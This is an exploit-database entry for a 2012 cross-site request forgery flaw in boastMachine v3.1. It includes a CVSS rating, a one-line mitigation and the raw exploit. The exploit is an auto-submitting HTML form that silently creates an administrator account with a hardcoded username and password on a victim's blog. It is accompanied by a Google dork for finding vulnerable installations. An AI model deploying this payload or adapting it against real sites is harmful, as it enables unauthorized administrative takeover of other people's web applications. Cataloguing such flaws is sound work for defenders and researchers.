header-logo
Suggest Exploit
vendor:
boastMachine
by:
Dr.NaNo
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: boastMachine
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: NO
Related CWE: N/A
CPE: a:boastology:boastmachine:3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux-Red-Hat
2012

boastMachine v3.1 <= CSRF Add Admin Vulnerability

A CSRF vulnerability exists in boastMachine v3.1 which allows an attacker to add an admin user to the application. An attacker can craft a malicious HTML page containing a form with hidden fields that when visited by an authenticated user, will submit the form and add an admin user to the application.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using CAPTCHA can help mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: boastMachine v3.1 <= CSRF Add Admin Vulnerability
# Date: 28/3/2012
# Author: Dr.NaNo
# Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip
# Version: 3.1
# Tested on: Linux-Red-Hat
# Google Dork: Powered by boastMachine v3.1
#
########################################################
#                     ~ Exploit ~                      #   
########################################################

<html>
<form  name="nano" action="http://localhost/{PACH}/bmc/admin.php?action=add_user&blog" method="post">
<input type="hidden" name="action" value="add_user"><br/>
<input type="hidden" name="do" value="add"><br/>
<input type="hidden" value="NANO" name="user_login"><br/>
<input type="hidden" value="NANO1234" name="user_pass"><br/>
<input type="hidden" value="Administrator" name="user_name"><br/>
<input type="hidden" value="security@wsecurity.com" name="user_email"><br/>
<input type="hidden" value="4" name="blogs[]"><br/>
<input type="hidden" value="4" name="user_level"><br/>
<input type="hidden" value="Add"><br/>
</form>
<script>document.nano.submit();</script>
</html>

########################################################
#                                                      #
# ~ Greetz : Dr.WEP , JIKO , ( All FriendS ) ~          #
#                                                      #
########################################################

Navigation

Suggest Exploit

Services By CQR